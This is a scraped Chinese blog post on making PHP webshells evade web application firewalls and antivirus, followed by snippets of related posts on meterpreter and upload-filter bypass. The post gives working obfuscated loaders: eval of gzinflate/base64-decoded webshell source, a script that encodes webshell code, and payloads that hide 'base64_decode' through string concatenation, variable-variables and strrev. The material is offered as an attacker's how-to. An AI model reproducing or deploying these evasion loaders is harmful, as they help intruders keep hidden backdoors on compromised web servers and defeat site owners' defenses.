php大马免杀技巧 | bypass waf

Part 1 前言

  

Part 2 免杀

  执行代码

eval 或 preg_replace的/e修饰符来执行大马代码。

   

$a = ‘phpinfo();‘;
eval($a);
//eval执行php代码

  编码

如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。

eval_gzinflate_base64类型加密与解密:

http://www.zhuisu.net/tool/phpencode.php

https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php

自己写脚本加密:

$code= file_get_contents(‘D:\phpStudy\WWW\Test\Zlib\help.txt‘); //大马源码路径
$encode = base64_encode(gzdeflate($code));  //加密函数自己修改就行
echo $encode; //输出加密后代码

  解码

通过解码执行我们的代码。

  

  

<?php                         //加密的代码
eval(gzinflate(base64_decode(‘S03OyFdQ8shUKLbMTVOyBgA=‘)));
?>

  关键字免杀

// 类型这样的关键字如果没有混淆拆分是过不了waf的
eval(gzinflate(base64_decode

// 我们需要做的就是关键字免杀

 

  免杀 payload

<?php
$l=‘baSe6‘;
$o=‘4_dE‘;
$v=‘cO‘;
$e=‘DE‘;
$love=$l.$o.$v.$e;
$c = "love";
$a=$$c(‘源码base64加密‘);
eval($a);
?>

<?php
$a = strrev(‘EdOcEd_46eSaB‘);
$b= $a(‘源码base64加密‘);
eval($b);
?>

  

  

原文地址:https://www.cnblogs.com/s0mf/p/9373471.html

时间: 2024-10-25 10:55:25

php大马免杀技巧 | bypass waf的相关文章

Bypass AV meterpreter免杀技巧

0x01 meterpreter简介 MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单. 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令,经常出现什么sending stager er

Webshell免杀绕过waf

0x01 前言# 尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧 0x02 目录# 关于eval 于 assert 字符串变形 定义函数绕过 回调函数 回调函数变形 特殊字符干扰 数组 类 编码绕过 无字符特征马 PHP7.1后webshell何去何从 总结 0x03 关于eval 于 assert# 关于eval函数在php给出的官方说明是 eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号()

BadBoy网络安全小组免杀系列教程

基本上讲解免杀技巧..值得一看 BadBoy网络安全小组免杀系列教程解压密码:www.hegouvip.com.rar 下载:http://pan.baidu.com/s/1mgwVH1I BadBoy网络安全小组免杀系列教程

2019-2020-2 20175218陈敬勇 《网络对抗技术》 Exp3 免杀原理与实践

2019-2020-2 20175218陈敬勇 <网络对抗技术> Exp3 免杀原理与实践 一.实验任务 方法 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳工具 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.实验准备 基础知识 Msfvenom使用

绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法. 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测. 废话不多说,切入正题.... 1.实验环境: Windows Server 2003. Apache/2.4.18.PHP/5.3.29.网站安全狗(Apache版)V3.5.12048 2.用于文件上传的PHP源码: <?php $path = dirname(__FILE__) . '/upload/'; $rand = rand(0,30);

[9期]软WAF上传绕过+webshell免杀

安全狗上传绕过 思路: 1.扰乱编码 form-data 替换成 ~form-data           form-data    改成 f+orm-data form-data    改成 form-d+ata          form-data   替换成   " filename="xxx"   改成  filename=xxx; 增减空格 对Content-Disposition,Content-Type,name,filename,form-data http参

杀毒与免杀技术详解之二:特征码定位-工具及原理

特征码引擎现在依然十分常见,家家户户都在用. 打开360杀毒,下面显示的4个引擎中,"系统修复引擎.小红伞引擎"都是使用特征码进行病毒查杀的,其余的也有用特征码进行辅助.可见,现在的杀软中,特征码查杀的方法依然占有不小的位置. 但是,特征码引擎有非常大的缺陷--容易被逃避.因为一般它只要见着特征码就报毒,如果我们把一份病毒分成很多份,就能根据报毒的文件,轻松定位出特征码的位置.那么只要稍作修改,特征码引擎就失效了.这就是我们今天要讨论的东西. 现在就进入正题了,这次我们来看看特征码定位

AF攻防研究之四个层次Bypass WAF

从架构.资源.协议和规则4个层次研究绕过WAF的技术,助于全方位提升WAF防御能力. 绕过WAF的相关技术研究是WAF攻防研究非常重要的一部分,也是最有趣的部分,所以我在写WAF攻防时先写攻击部分.还是那句老话“不知攻焉知防”,如果连绕过WAF方法都不知道,怎么保证WAF能保护后端服务的安全.在我看来,WAF的绕过技术的研究将不断驱动防御水平提高. 以前一些WAF bypass的文章更像CASE的整理,都把焦点放在了规则对抗层面.绕过WAF规则,更像是正面对抗,属于下策.一直关注规则层面的绕过,

杀毒与免杀技术详解之三:特征码免杀实战

1.前言 在前篇<杀毒与免杀技术详解之二:特征码定位-工具及原理 >中,笔者主要介绍了MyCCL这个特征码定位工具的使用方式,并对它的原理进行了一步步的分析解释,最后讲了学习这一工具的意义和作用.今天,在这实战篇中,我们将应用前面学到的知识,以几个市面上的特征码杀毒引擎为例,进行实战的免杀.同时也非常欢迎诸位朋友指点,互相学习.进步! 2.实战环境 实验主机: Vmware 11虚拟机 操作系统: XP sp3 实验用具: MyCCL 2.1.C32Asm.一份病毒样本(encode.exe)